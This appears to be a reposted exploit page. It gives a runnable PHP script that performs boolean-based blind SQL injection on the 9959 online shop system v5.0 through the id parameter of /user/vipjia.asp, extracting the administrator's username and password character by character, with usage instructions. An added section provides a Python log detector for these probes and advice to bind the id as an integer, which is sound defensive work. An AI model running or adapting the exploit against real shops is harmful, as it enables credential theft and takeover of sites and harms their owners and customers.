9959 网店系统 (9959 Online Shop System) v5.0 Blind SQL injection exploit


Author: 闷豆

The following is a quoted snippet:

<?php
print_r('
+---------------------------------------------------------------------------+
 9959网店系统 v5.0 Blind SQL injection exploit by mendou
 官方网站:


+---------------------------------------------------------------------------+
');

// Two arguments are required: host and id
if ($argc < 3) {
  print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host id
Example:
php '.$argv[0].' localhost  id
+---------------------------------------------------------------------------+
');
  exit;
}

error_reporting(0);
ini_set('max_execution_time', 0);
$host = $argv[1];
$str = "abcdefghijklmnopqrstuvwxyz0123456789"; // candidate characters
$strlen = strlen($str);
$pid = $argv[2];

$n_len = lenstr("adminname"); // username length
echo "用户长度:".$n_len."\r\n";
pojie("adminname", $n_len); echo "\r\n";
$p_len = lenstr("password"); // password length
echo "密码长度:".$p_len."\r\n";
pojie("password", $p_len);

// Recover column $str1 one character at a time (boolean-based blind injection)
function pojie($str1, $len){
    global $host, $strlen, $str, $pid;
    for ($j=1 ; $j<=$len ; $j++){
        for ($i=0 ; $i<$strlen ; $i++){
            $exp =  "%20and%20(select%20top%201%20mid(".$str1.",".$j.",1)%20from%20hu_admin)='".$str[$i]."'";
            $a = file_get_contents('http://'.$host.'/user/vipjia.asp?action=loads&id='.$pid.$exp);
            // The script treats a response containing "次" as a true condition
            if (strpos($a, "次") !== false){
                echo $str[$i]; break;
            }
        }
    }
}

// Determine the length of the username or password
function lenstr($str){
    global $host, $pid;
    // The loop's upper bound was lost in extraction; 32 is an assumed value
    for ($i=1 ; $i<=32 ; $i++){
        $exp =  "%20and%20(select%20top%201%20len(".$str.")%20from%20hu_admin)=".$i;
        $a = file_get_contents('http://'.$host.'/user/vipjia.asp?action=loads&id='.$pid.$exp);
        if (strpos($a, "次") !== false){
            return $i;
        }
    }
}

?>
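For defenders, the request pattern this script produces is easy to spot in web server logs. The following is an added example, not part of the original post: it flags clients that send repeated `(select top 1 mid|len(...` probes in the `id` parameter of `/user/vipjia.asp`. The log field order, the sample lines, the threshold and the assumption that a legitimate `id` is numeric are all constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed sample log (not from the page). Assumed W3C-style field order:
# date time c-ip method uri-stem uri-query status
_Q = "GET /user/vipjia.asp action=loads&id=12%20and%20(select%20top%201%20"
_T = "%20from%20hu_admin)="
SAMPLE_LOG = "\n".join([
    "2013-01-01 10:00:01 192.0.2.10 GET /user/vipjia.asp action=loads&id=12 200",
    f"2013-01-01 10:00:02 198.51.100.7 {_Q}len(adminname){_T}1 200",
    f"2013-01-01 10:00:02 198.51.100.7 {_Q}len(adminname){_T}2 200",
    f"2013-01-01 10:00:03 198.51.100.7 {_Q}mid(adminname,1,1){_T}%27a%27 200",
    f"2013-01-01 10:00:03 198.51.100.7 {_Q}mid(adminname,1,1){_T}%27b%27 200",
    f"2013-01-01 10:00:04 198.51.100.7 {_Q}len(password){_T}1 200",
    "2013-01-01 10:00:05 203.0.113.4 GET /user/vipjia.asp action=loads&id=12abc 200",
    "2013-01-01 10:00:06 192.0.2.10 GET /index.asp - 200",
])

# Shape of the probes the script sends: (select top 1 mid|len(<column>...
PROBE = re.compile(r"\(\s*select\s+top\s+1\s+(mid|len)\s*\(\s*(\w+)", re.I)

def find_blind_sqli(log_text, stem="/user/vipjia.asp", min_probes=3):
    """Map client IP -> probe statistics for clients that sent at least
    min_probes boolean-blind probes in the id parameter of `stem`."""
    hits = defaultdict(lambda: {"probes": 0, "non_numeric": 0, "columns": set()})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 7 or parts[4].lower() != stem:
            continue
        ip, query = parts[2], parts[5]
        # parse_qs URL-decodes the value, so %20 becomes a space before matching
        for value in parse_qs(query, keep_blank_values=True).get("id", []):
            if value.isdigit():
                continue  # assumption: a legitimate id is numeric
            hits[ip]["non_numeric"] += 1
            m = PROBE.search(value)
            if m:
                hits[ip]["probes"] += 1
                hits[ip]["columns"].add(m.group(2).lower())
    return {ip: h for ip, h in hits.items() if h["probes"] >= min_probes}

if __name__ == "__main__":
    for ip, h in find_blind_sqli(SAMPLE_LOG).items():
        print(ip, h["probes"], "probes against", sorted(h["columns"]))
```

On the application side, the same assumption points at the fix: reject any `id` that is not an integer and pass it to the query as a bound parameter instead of concatenating it.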

Source: lcx.cc: 9959 网店系统 v5.0 Blind SQL injection exploit
